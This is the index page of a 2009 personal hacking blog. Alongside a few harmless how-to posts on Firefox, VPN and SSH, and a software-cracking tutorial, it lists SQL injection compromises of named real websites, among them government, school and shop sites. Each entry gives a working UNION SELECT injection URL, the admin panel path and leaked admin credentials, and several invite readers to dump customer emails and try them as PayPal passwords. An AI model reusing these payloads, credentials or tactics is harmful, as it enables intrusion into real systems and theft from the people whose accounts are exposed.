viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, October 30, 2009

-- Blog CLOSED --

11:46 PM Posted by viperfx07 No comments
I think I get no time to update hacking activities because of my study. If you want to get any updates of manga, just go to onemanga.com or baka-updates.com.See you next time...

Tuesday, August 11, 2009

[Tutorial] Remote Desktop and SSH behind HTTP NTLM Authentication Proxy Server

3:25 PM Posted by viperfx07 No comments
This is a great lesson and i can't do it in my hometown because my ISP there blocks all inbound ports. Here, in Australia, i can learn and do it in one university.There are some configurations needed to do this. I have my laptop behind router to connect to the internet.Laptop : 192.168.1.75Public IP: 123.243.61.232You need to download:1. Putty. A great free telnet/SSH tool.2. CopSSH. free SSH server1st,...

Tuesday, August 4, 2009

[Tutorial] Disable Splash Screen on Firefox Portable

5:31 PM Posted by viperfx07 No comments
1. Copy the \FireFoxPortable\Other\Source\FirefoxPortable.ini to the \FirefoxPortable (or where FirefoxPortable.exe exist) or you can create a file and name it FirefoxPortable.ini2. Make sure the content of the file is like below (especially the DisableSplashScreen):[FirefoxPortable]FirefoxDirectory=App\firefoxProfileDirectory=Data\profileSettingsDirectory=Data\settingsPluginsDirectory=Data\plugi...

[Tutorial] Installing Flash Player Plugin on Firefox without Administrator Privilege or Installation File

5:27 PM Posted by viperfx07 No comments
UPDATE: The following guide, originally wrote for Firefox 2, has been used successfully on Firefox 3 and Firefox 3.5. Users of Firefox Portable edition (versions 3 and 3.5) also have been successful using this guide.The Windows computers available at my University permits login only by autenticated users (students) who don't have Administrator access and permissions.Installing software on those PC...

Wednesday, July 15, 2009

[Tutorial] Configure a VPN connection in WinXP

4:10 PM Posted by viperfx07 No comments
I found good tutorials on the net and it really works. Here are the tuts:Configure a VPN server: http://www.onecomputerguy.com/networking/xp_vpn_server.htmConfigure a VPN client: http://www.onecomputerguy.com/networking/xp_vpn....

Saturday, July 11, 2009

[Hacking] darkMySQLi v1.6

3:12 PM Posted by viperfx07 , No comments
New Version of schemafuzz.Download: http://tinyurl.com/darkMySQLi16More information: click Read More or here#!/usr/bin/python #2/06/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # /...

Sunday, March 22, 2009

[SQLi] http://www.queenbeehunt.com

11:14 PM Posted by viperfx07 No comments
I can't enjoy hacking as much as i could. It's really annoying. Below is my first hack in this month and it's unintended. Tool: schemafuzz.py v5.0 mod by me & IntelliTamperAdmin panel: http://www.queenbeehunt.com/magnm/Admin usr/pwd: admin:admin or andy:admin[+] URL:http://www.queenbeehunt.com/finalist/?detail=87+and+1=2+union+select+1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--[+]...

Friday, February 13, 2009

Saturday, February 7, 2009

[SQLi] http://www.axis.co.id

12:02 PM Posted by viperfx07 No comments
Tools : schemafuzz.py v.50 mod by meAdmin panel: /login.phpAdmin user/pwd: mommy:mommyP.S: this vuln already been found, and it's on google[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--[+] Evasion Used: "+" "--"[+] 11:53:15[+] Proxy Not...

Thursday, February 5, 2009

[SQLi] http://www.nafed.go.id

3:57 PM Posted by viperfx07 No comments
Tools: schemafuzz.py v5.0 mod by me.Admin loc: /adminAdmin user/pwd: enter this "' or 'a'='a" (without double quotes) to both fields.Ps: It's already been owned by some Turkey hackers. ^^[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*[+]...

Tuesday, February 3, 2009

[SQLi] http://www.endonesia.org

5:51 PM Posted by viperfx07 No comments
Dork : "Powered by endonesia 8.4"Tools: schemafuzz.py v5.0 mod by meAdmin panel: /adminAdmin usr/pwd : Endonesia:jatwar22[+] URL:http://www.endonesia.org/mod.php?mod=publisher&op=viewarticle&cid=1&artid=2+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--[+] Evasion Used: "+" "--"[+] 17:46:47[+]...

[SQLi] http://www.iklansolo.net

5:32 PM Posted by viperfx07 No comments
Tools: schemafuzz v5.0 mod by meDork : "Powered by eNdonesia 8.4"This exploit can also be found on milworm.com, but there is a slight different.Admin panel : http://www.iklansolo.netAdmin usr/pwd : admin : is12123[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--[+]...

[SQLi] http://www.enutrition.com.au

2:06 PM Posted by viperfx07 1 comment
Tools : schemafuzz.py v5.0 mod by meAdv : some email password is their paypal password. So dump it and check it by yourself. First 102 rows are already dumped by me.[+] URL:http://www.enutrition.com.au/product.php?p_id=491+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--[+] Evasion Used: "+" "--"[+] 13:32:19[+] Proxy Not Given[+] Gathering MySQL Server...

[SQLi] http://www.healthfitness.com.au

2:02 PM Posted by viperfx07 No comments
Tools: schemafuzz.py v5.0 mod by meAdvantage: Use it wisely. Dump it and check if their paypal password is their email password ^^[+] URL:http://www.healthfitness.com.au/shop/product.php?p_id=56+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--[+] Evasion Used: "+" "--"[+] 13:29:28[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: db60028b User:...

Saturday, January 17, 2009

[SQLi] http://www.koranslawi.com

12:46 AM Posted by viperfx07 No comments
Another site using QB Headlines. koranslawi.com hacked using sql injectionTool = schemafuzz.py v5.0Admin page = http://koranslawi.com/admin/Admin usr:pwd = admin:qbpwd[+] URL: http://koranslawi.com/index.php?cat=2+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4,5,6,7,8,9--[+] Evasion Used: "+" "--"[+] 23:46:30[-]...

Friday, January 16, 2009

[SQLi] http://www.ukb.ac.id

10:57 PM Posted by viperfx07 No comments
Tool = schemafuzz.py v5.0 mod by meAdmin page = http://www.ukb.ac.id/admin/Admin usr:pwd = saropi:saropi[+] URL: http://www.ukb.ac.id/detail_berita.php?id=15+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 22:52:20[-] Proxy Not Given[+] Gathering MySQL Server Configuration... Database:...

Sunday, January 11, 2009

[SQLi] http://www.smakkosayu.sch.id [FIXED]

5:15 PM Posted by viperfx07 1 comment
Update (12/01/09): fixed by admin. Good admin :)Admin page: http://www.smakkosayu.sch.idAdmin usr/pwd: administrator:h1r0sh1m4Tool: schemafuzz v5.0 mod by me[+] URL:http://www.smakkosayu.sch.id/page.php?s=7&pageid=157/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*[+] Evasion Used: "/**/"...

Tuesday, January 6, 2009

[Tutorial] Crack Simple Program with Ollydbg

11:24 AM Posted by viperfx07 , 2 comments
This is a Translation of a text by Bastijs.The tutorial is based on Net Force crackit3 and was written to help beginning (software) crackers to get started... In the future I'll release an entire series on cracking, which will start at the very basics.Lets dive right into the cracking..The program prompts one of these to messages: "ACCESS GRANTED" or "ACCESS DENIED".We start ollydbg and scroll to...